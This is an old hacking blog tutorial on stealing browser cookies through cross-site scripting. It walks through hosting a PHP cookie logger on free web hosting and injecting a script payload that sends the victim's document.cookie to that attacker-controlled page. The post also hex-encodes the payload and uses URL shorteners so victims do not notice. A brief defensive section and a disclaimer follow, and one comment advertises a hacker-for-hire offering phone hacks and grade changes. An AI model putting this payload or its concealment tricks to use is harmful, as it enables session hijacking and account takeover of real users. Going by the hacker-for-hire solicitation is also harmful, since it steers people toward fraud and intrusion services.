Saturday, January 07, 2012

How to do Cookie Stealing with Cross site Scripting Vulnerability ? : XSS Tutorials

Hope, you are now familiar with XSS vulnerability..! Today i am going to explain how an attacker exploit XSS vulnerability and steal cookie from users.

Requirements:
  • A cookie Stealer code : Get it from here
  • Free Web hosting service
  • Basic Knowledge about XSS
  • Basic Knowledge about Computer Cookies
 Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.


Step 1: Creating Cookie Stealer PHP file

 
Get the Cookie stealer from the link i mentioned.  In that post, i have explained three versions of cookie stealer.  We are going to use the third version.
  • Copy the code.
  • Open Notepad and paste the code
  • Save the file with .php extension
    Eg: Stealer.php
Now create New file and save it as log.txt (leave it as blank). Don't change the name , this is the file name what we give in php file.

Now you will have two files;
1. Stealer.php
2. log.txt

What these two files do exactly?
The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
The log.txt has cookies , ip address details.

Step 2: 
Register in a free web-hosting service and login into your cpanel.
Now open the File Manager in cpanel.
Upload the Stealer.php and log.txt to root folder or public_html folder.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So Far , we have sharpened our saw.  Now we are going to use it.
Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.


<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Persistent XSS:
Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don't need to send any link to others.  Whoever visit the page, they will be vicim.

Non-Persistent:
In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Non-persistent XSS .

In Non-persistence, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link is clearly shows the scripts.  Hackers can Hex-encode this script  so that victim can't see the script.
For Example:

hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim follow the link, his cookie will be stored in log.txt file.

How to be Secure from this attack?
  • Use No-Script Addon. This is best protection to stay away from XSS 
  • Never Click the Shorten url
  • Sometime you may want to follow the shorten link.  If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)
  • (Later We will cover security tips for site admin , so stay tuned) 
Warning!!!
HAckersgrp does not take responsibility, if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting,  investigations by legal security agencies.
 JOIN MY BLOG NOW..
BECOME A MEMBER..

3 comments:

ShivShankar Namdev said...

osum

jasonbob said...

supreme clothing
off white nike
yeezy sneakers
supreme
longchamp
nike lebron shoes
golden goose superstar
supreme shirt
balenciaga trainers
yeezys
xiaofang20191225

jane holly said...

This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change

Email:onlineghosthacker247@ gmail .com

Post a Comment

 
Design by Secure Hackers